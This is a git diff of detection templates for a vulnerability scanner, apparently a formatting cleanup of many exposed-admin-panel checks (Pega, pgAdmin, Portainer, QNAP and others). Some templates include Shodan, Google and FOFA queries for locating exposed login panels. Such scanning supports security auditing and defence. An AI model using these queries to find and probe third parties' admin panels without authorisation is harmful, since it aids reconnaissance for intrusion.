a/http/exposed-panels/pega-web-panel.yaml +++ b/http/exposed-panels/pega-web-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.pega.com/infinity classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Pega Platform" google-query: inurl:"/prweb/PRAuth/app/default" tags: panel,pega @@ -28,6 +28,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/pentaho-panel.yaml b/http/exposed-panels/pentaho-panel.yaml index 7966893b41..f1d3e54799 100644 --- a/http/exposed-panels/pentaho-panel.yaml +++ b/http/exposed-panels/pentaho-panel.yaml @@ -7,7 +7,7 @@ info: description: Pentaho User Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/persis-panel.yaml b/http/exposed-panels/persis-panel.yaml index bcc8e9465b..0f9720299c 100644 --- a/http/exposed-panels/persis-panel.yaml +++ b/http/exposed-panels/persis-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.persis.de/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Persis" tags: panel,persis @@ -26,6 +26,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/pfsense-login.yaml b/http/exposed-panels/pfsense-login.yaml index 5a486a6d3c..239a8edc65 100644 --- a/http/exposed-panels/pfsense-login.yaml +++ b/http/exposed-panels/pfsense-login.yaml @@ -10,7 +10,7 @@ info: - https://www.pfsense.org/getting-started/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/pgadmin-exposure.yaml b/http/exposed-panels/pgadmin-exposure.yaml index e98dd63ab3..bdf02298cd 100644 --- a/http/exposed-panels/pgadmin-exposure.yaml +++ b/http/exposed-panels/pgadmin-exposure.yaml @@ -7,16 +7,17 @@ info: description: PostgreSQL pgAdmin Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: unauth,pgadmin,postgres,panel metadata: max-request: 1 + tags: unauth,pgadmin,postgres,panel http: - method: GET path: - "{{BaseURL}}/browser/" + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/phabricator-login.yaml b/http/exposed-panels/phabricator-login.yaml index 014e5ef099..3c764bba07 100644 --- a/http/exposed-panels/phabricator-login.yaml +++ b/http/exposed-panels/phabricator-login.yaml @@ -7,7 +7,7 @@ info: description: Phabricator login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,7 +21,6 @@ http: matchers-condition: and matchers: - - type: word words: - 'phabricator-standard-page' diff --git a/http/exposed-panels/phoronix-pane.yaml b/http/exposed-panels/phoronix-pane.yaml index d4ccc07932..2fea006944 100644 --- a/http/exposed-panels/phoronix-pane.yaml +++ b/http/exposed-panels/phoronix-pane.yaml @@ -7,7 +7,7 @@ info: description: Phoronix Test Suite panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -34,4 +34,4 @@ http: part: body group: 1 regex: - - "Phoronix Test Suite (.*) - Phoromatic - Welcome" + - 'Phoronix Test Suite (.*) - Phoromatic - Welcome' diff --git a/http/exposed-panels/php-mailer.yaml b/http/exposed-panels/php-mailer.yaml index beb2017f64..2a18ead283 100644 --- a/http/exposed-panels/php-mailer.yaml +++ b/http/exposed-panels/php-mailer.yaml @@ -7,11 +7,11 @@ info: description: PHPMailer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"PHP Mailer" tags: panel,php,mailer diff --git a/http/exposed-panels/phpcollab-panel.yaml b/http/exposed-panels/phpcollab-panel.yaml index 88b82b31ed..b0626bb813 100644 --- a/http/exposed-panels/phpcollab-panel.yaml +++ b/http/exposed-panels/phpcollab-panel.yaml @@ -7,7 +7,7 @@ info: description: phpCollab login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index da469e8ea4..c93d9f7d84 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -5,9 +5,9 @@ info: author: ritikchaddha,DhiyaneshDk severity: info metadata: + verified: true max-request: 3 shodan-query: title:"phpLDAPadmin" - verified: true tags: php,phpldapadmin,panel,detect http: @@ -20,6 +20,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/phpminiadmin-panel.yaml b/http/exposed-panels/phpminiadmin-panel.yaml index d0dd0e5baf..34f6dcb7c5 100644 --- a/http/exposed-panels/phpminiadmin-panel.yaml +++ b/http/exposed-panels/phpminiadmin-panel.yaml @@ -10,11 +10,11 @@ info: - https://github.com/osalabs/phpminiadmin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"phpMiniAdmin" tags: panel,phpminiadmin diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index 4020f401e3..4b1bddcc74 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -7,7 +7,7 @@ info: description: phpMyAdmin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 12 diff --git a/http/exposed-panels/phppgadmin-panel.yaml b/http/exposed-panels/phppgadmin-panel.yaml index 8dcb304336..f3c2d1a8ad 100644 --- a/http/exposed-panels/phppgadmin-panel.yaml +++ b/http/exposed-panels/phppgadmin-panel.yaml @@ -10,11 +10,11 @@ info: - https://docs.cpanel.net/cpanel/databases/phppgadmin/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:phpPgAdmin tags: panel,phppgadmin diff --git a/http/exposed-panels/pichome-panel.yaml b/http/exposed-panels/pichome-panel.yaml index 8484cf3463..e341070213 100644 --- a/http/exposed-panels/pichome-panel.yaml +++ b/http/exposed-panels/pichome-panel.yaml @@ -7,11 +7,11 @@ info: description: Pichome login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:933976300 tags: pichome,panel @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/piwigo-panel.yaml b/http/exposed-panels/piwigo-panel.yaml index ef268ded2d..acdf872d8a 100644 --- a/http/exposed-panels/piwigo-panel.yaml +++ b/http/exposed-panels/piwigo-panel.yaml @@ -9,11 +9,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="piwigo" - google-query: Powered by Piwigo + verified: true max-request: 2 shodan-query: http.favicon.hash:540706145 - verified: true + fofa-query: title="piwigo" + google-query: Powered by Piwigo tags: panel,piwigo,detect http: @@ -25,6 +25,7 @@ http: stop-at-first-match: true redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/planet-estream-panel.yaml b/http/exposed-panels/planet-estream-panel.yaml index 810c8471e8..87604d20e8 100644 --- a/http/exposed-panels/planet-estream-panel.yaml +++ b/http/exposed-panels/planet-estream-panel.yaml @@ -7,11 +7,11 @@ info: description: Planet eStream login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Login - Planet eStream" tags: panel,planet,estream @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/plastic-scm-login.yaml b/http/exposed-panels/plastic-scm-login.yaml index e36d2382d5..86a71fc121 100644 --- a/http/exposed-panels/plastic-scm-login.yaml +++ b/http/exposed-panels/plastic-scm-login.yaml @@ -7,7 +7,7 @@ info: description: Unity Plastic SCM login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,6 +24,7 @@ http: - type: word words: - 'Log in - Plastic SCM' + - type: status status: - 200 diff --git a/http/exposed-panels/plesk-obsidian-login.yaml b/http/exposed-panels/plesk-obsidian-login.yaml index 685a529b36..19def8e211 100644 --- a/http/exposed-panels/plesk-obsidian-login.yaml +++ b/http/exposed-panels/plesk-obsidian-login.yaml @@ -7,11 +7,11 @@ info: description: Plesk Obsidian login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Plesk Obsidian" tags: panel,plesk,login,edb diff --git a/http/exposed-panels/plesk-onyx-login.yaml b/http/exposed-panels/plesk-onyx-login.yaml index 7e28df5525..df64f3b64b 100644 --- a/http/exposed-panels/plesk-onyx-login.yaml +++ b/http/exposed-panels/plesk-onyx-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6501 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Plesk Onyx" google-query: inurl:login_up.php "Plesk Onyx" tags: panel,plesk,login,edb diff --git a/http/exposed-panels/polycom-admin-detect.yaml b/http/exposed-panels/polycom-admin-detect.yaml index 6bd378edbd..87e81df28c 100644 --- a/http/exposed-panels/polycom-admin-detect.yaml +++ b/http/exposed-panels/polycom-admin-detect.yaml @@ -7,11 +7,11 @@ info: description: Polycom admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET diff --git a/http/exposed-panels/polycom-login.yaml b/http/exposed-panels/polycom-login.yaml index e24489bd3e..f6f5ef5062 100644 --- a/http/exposed-panels/polycom-login.yaml +++ b/http/exposed-panels/polycom-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6863 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,panel metadata: max-request: 1 + tags: edb,panel http: - method: GET diff --git a/http/exposed-panels/portainer-panel.yaml b/http/exposed-panels/portainer-panel.yaml index 908c45095f..1b16a30ab6 100644 --- a/http/exposed-panels/portainer-panel.yaml +++ b/http/exposed-panels/portainer-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/portainer/portainer metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Portainer" tags: panel,portainer,detect @@ -21,6 +21,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/posthog-admin-panel.yaml b/http/exposed-panels/posthog-admin-panel.yaml index d2acdb4317..e0efb47e26 100644 --- a/http/exposed-panels/posthog-admin-panel.yaml +++ b/http/exposed-panels/posthog-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: PostHog login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"posthog" tags: panel,posthog diff --git a/http/exposed-panels/powercom-network-manager.yaml b/http/exposed-panels/powercom-network-manager.yaml index 8832f01f36..f848833300 100644 --- a/http/exposed-panels/powercom-network-manager.yaml +++ b/http/exposed-panels/powercom-network-manager.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"PowerCom Network Manager" tags: powercommanager,login,panel @@ -24,4 +24,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/powerjob-panel.yaml b/http/exposed-panels/powerjob-panel.yaml index 5c0b7a9e40..ac26f4ede6 100644 --- a/http/exposed-panels/powerjob-panel.yaml +++ b/http/exposed-panels/powerjob-panel.yaml @@ -7,11 +7,11 @@ info: description: PowerJob login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="PowerJob" tags: panel,powerjob diff --git a/http/exposed-panels/powerlogic-ion.yaml b/http/exposed-panels/powerlogic-ion.yaml index c92d84c7f5..5be548c526 100644 --- a/http/exposed-panels/powerlogic-ion.yaml +++ b/http/exposed-panels/powerlogic-ion.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6810 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'PowerLogic ION' + - type: status status: - 200 diff --git a/http/exposed-panels/pritunl-panel.yaml b/http/exposed-panels/pritunl-panel.yaml index 4a02bb2aae..3b5effa7ef 100644 --- a/http/exposed-panels/pritunl-panel.yaml +++ b/http/exposed-panels/pritunl-panel.yaml @@ -11,8 +11,8 @@ info: - https://uptime.kuma.pet/docs/ metadata: verified: true - shodan-query: title:"Pritunl" max-request: 1 + shodan-query: title:"Pritunl" tags: pritunl,panel,login http: diff --git a/http/exposed-panels/privx-panel.yaml b/http/exposed-panels/privx-panel.yaml index 1b30338521..c3525640f7 100644 --- a/http/exposed-panels/privx-panel.yaml +++ b/http/exposed-panels/privx-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.ssh.com/products/privx/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/processwire-login.yaml b/http/exposed-panels/processwire-login.yaml index f6570f1bbb..c1c3e8486f 100644 --- a/http/exposed-panels/processwire-login.yaml +++ b/http/exposed-panels/processwire-login.yaml @@ -8,11 +8,11 @@ info: reference: https://processwire.com/docs/security/admin/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"processwire" tags: panel,processwire diff --git a/http/exposed-panels/project-insight-login.yaml b/http/exposed-panels/project-insight-login.yaml index 25eb530b91..3fbe028e1a 100644 --- a/http/exposed-panels/project-insight-login.yaml +++ b/http/exposed-panels/project-insight-login.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7413 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/projectsend-login.yaml b/http/exposed-panels/projectsend-login.yaml index b1102d782d..ed1134ee12 100644 --- a/http/exposed-panels/projectsend-login.yaml +++ b/http/exposed-panels/projectsend-login.yaml @@ -10,7 +10,7 @@ info: - https://github.com/projectsend/projectsend classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/prometheus-exposed-panel.yaml b/http/exposed-panels/prometheus-exposed-panel.yaml index 6eda916211..ec0bc5956f 100644 --- a/http/exposed-panels/prometheus-exposed-panel.yaml +++ b/http/exposed-panels/prometheus-exposed-panel.yaml @@ -7,11 +7,11 @@ info: description: Prometheus panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,prometheus metadata: max-request: 1 + tags: panel,prometheus http: - method: GET diff --git a/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml b/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml index a2663b5eb3..97129697f7 100644 --- a/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml +++ b/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml @@ -7,11 +7,11 @@ info: description: Prometheus Pushgateway panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,prometheus,pushgateway metadata: max-request: 1 + tags: panel,prometheus,pushgateway http: - method: GET diff --git a/http/exposed-panels/proxmox-panel.yaml b/http/exposed-panels/proxmox-panel.yaml index 7e22cac7ee..f9d9be148b 100644 --- a/http/exposed-panels/proxmox-panel.yaml +++ b/http/exposed-panels/proxmox-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.proxmox.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:213144638 tags: panel,proxmox,login diff --git a/http/exposed-panels/pulsar-admin-console.yaml b/http/exposed-panels/pulsar-admin-console.yaml index 08b5ac6e5e..c669f84863 100644 --- a/http/exposed-panels/pulsar-admin-console.yaml +++ b/http/exposed-panels/pulsar-admin-console.yaml @@ -7,11 +7,11 @@ info: description: Pulsar admin console panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Pulsar Admin Console" tags: panel,pulsar,console,admin diff --git a/http/exposed-panels/pulsar-adminui-panel.yaml b/http/exposed-panels/pulsar-adminui-panel.yaml index b52110c732..0e806db2b6 100644 --- a/http/exposed-panels/pulsar-adminui-panel.yaml +++ b/http/exposed-panels/pulsar-adminui-panel.yaml @@ -7,11 +7,11 @@ info: description: Pulsar admin UI panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Pulsar Admin UI" tags: panel,pulsar,pulsarui,admin diff --git a/http/exposed-panels/pulsar360-admin-panel.yaml b/http/exposed-panels/pulsar360-admin-panel.yaml index e78979bef6..eedc57d97b 100644 --- a/http/exposed-panels/pulsar360-admin-panel.yaml +++ b/http/exposed-panels/pulsar360-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: Pulsar360 admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Pulsar Admin" tags: panel,pulsar360,pulsar,admin diff --git a/http/exposed-panels/pulse-secure-panel.yaml b/http/exposed-panels/pulse-secure-panel.yaml index d12202343f..4460efec3d 100644 --- a/http/exposed-panels/pulse-secure-panel.yaml +++ b/http/exposed-panels/pulse-secure-panel.yaml @@ -7,11 +7,11 @@ info: description: Pulse Secure VPN login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,pulse,vpn metadata: max-request: 3 + tags: panel,pulse,vpn http: - method: GET @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/pulse-secure-version.yaml b/http/exposed-panels/pulse-secure-version.yaml index d3594a6e90..258e4b8bd2 100644 --- a/http/exposed-panels/pulse-secure-version.yaml +++ b/http/exposed-panels/pulse-secure-version.yaml @@ -4,17 +4,18 @@ info: name: Pulse Secure Version author: dadevel severity: info - tags: pulse,panel metadata: max-request: 2 + tags: pulse,panel http: - method: GET path: - - "{{BaseURL}}/dana-na/nc/nc_gina_ver.txt" # not present in newer release + - "{{BaseURL}}/dana-na/nc/nc_gina_ver.txt" # not present in newer release - "{{BaseURL}}/dana-cached/hc/HostCheckerInstaller.osx" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/puppetboard-panel.yaml b/http/exposed-panels/puppetboard-panel.yaml index 8d5ebe900c..af0ec39292 100644 --- a/http/exposed-panels/puppetboard-panel.yaml +++ b/http/exposed-panels/puppetboard-panel.yaml @@ -8,11 +8,11 @@ info: reference: https://github.com/voxpupuli/puppetboard classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Puppetboard" tags: panel,puppet,exposure @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/pure-storage-login.yaml b/http/exposed-panels/pure-storage-login.yaml index 3e3e61d80f..16753c8c89 100644 --- a/http/exposed-panels/pure-storage-login.yaml +++ b/http/exposed-panels/pure-storage-login.yaml @@ -7,7 +7,7 @@ info: description: Pure Storage login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/pyload-panel.yaml b/http/exposed-panels/pyload-panel.yaml index 3c40306c27..262f546a7d 100644 --- a/http/exposed-panels/pyload-panel.yaml +++ b/http/exposed-panels/pyload-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/pyload/pyload metadata: + verified: true max-request: 2 shodan-query: title:"Login - pyLoad" - verified: true tags: panel,pyload,login http: @@ -22,6 +22,7 @@ http: stop-at-first-match: true host-redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/pypicloud-panel.yaml b/http/exposed-panels/pypicloud-panel.yaml index 6c5008b17d..7a39f6b5b0 100644 --- a/http/exposed-panels/pypicloud-panel.yaml +++ b/http/exposed-panels/pypicloud-panel.yaml @@ -9,7 +9,7 @@ info: - https://pypicloud.readthedocs.io/en/latest/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/qBittorrent-panel.yaml b/http/exposed-panels/qBittorrent-panel.yaml index d4cf45ee3c..c07a6baa04 100644 --- a/http/exposed-panels/qBittorrent-panel.yaml +++ b/http/exposed-panels/qBittorrent-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.qbittorrent.org/ metadata: - max-request: 2 verified: true + max-request: 1 shodan-query: title:"qbittorrent" tags: panel,qbittorrent,detect @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml index 44d96a0a02..d65ddaf5b7 100644 --- a/http/exposed-panels/qdpm-login-panel.yaml +++ b/http/exposed-panels/qdpm-login-panel.yaml @@ -5,9 +5,9 @@ info: author: theamanrawat severity: info metadata: + verified: "true" max-request: 2 shodan-query: http.favicon.hash:762074255 - verified: "true" tags: panel,qdpm,login http: @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/index.php/login' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/qlik-sense-server.yaml b/http/exposed-panels/qlik-sense-server.yaml index 266a8f6aa5..7bcda04958 100644 --- a/http/exposed-panels/qlik-sense-server.yaml +++ b/http/exposed-panels/qlik-sense-server.yaml @@ -10,11 +10,11 @@ info: - https://www.qlik.com/us/products/qlik-sense classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Qlik-Sense" fofa-query: app="Qlik-Sense" tags: panel,qlik diff --git a/http/exposed-panels/qmail-admin-login.yaml b/http/exposed-panels/qmail-admin-login.yaml index fad3d79ace..23e73c1ae6 100644 --- a/http/exposed-panels/qmail-admin-login.yaml +++ b/http/exposed-panels/qmail-admin-login.yaml @@ -7,11 +7,11 @@ info: description: QmailAdmin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 5 verified: true + max-request: 5 shodan-query: title:"QmailAdmin" tags: qmail,panel @@ -27,9 +27,9 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "QmailAdmin" diff --git a/http/exposed-panels/qnap/qnap-photostation-panel.yaml b/http/exposed-panels/qnap/qnap-photostation-panel.yaml index c9a6e14ca7..38001f7ba4 100644 --- a/http/exposed-panels/qnap/qnap-photostation-panel.yaml +++ b/http/exposed-panels/qnap/qnap-photostation-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.qnap.com/th-th/software/photo-station classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Photo Station" tags: panel,photostation,qnap @@ -25,7 +25,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/exposed-panels/qnap/qnap-qts-panel.yaml b/http/exposed-panels/qnap/qnap-qts-panel.yaml index 91a141b807..bf16dbe848 100644 --- a/http/exposed-panels/qnap/qnap-qts-panel.yaml +++ b/http/exposed-panels/qnap/qnap-qts-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.qnap.com/qts/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: product:"QNAP" google-query: intitle:"QNAP Turbo NAS" inurl:/cgi-bin tags: panel,qnap,qts @@ -28,6 +28,7 @@ http: stop-at-first-match: true redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/qualcomm-voip-router.yaml b/http/exposed-panels/qualcomm-voip-router.yaml index 6022a73967..d911c56591 100644 --- a/http/exposed-panels/qualcomm-voip-router.yaml +++ b/http/exposed-panels/qualcomm-voip-router.yaml @@ -7,7 +7,7 @@ info: description: Qualcomm 4G LTE Wifi VoIP router panel was detected. classification: cvss-metrics: 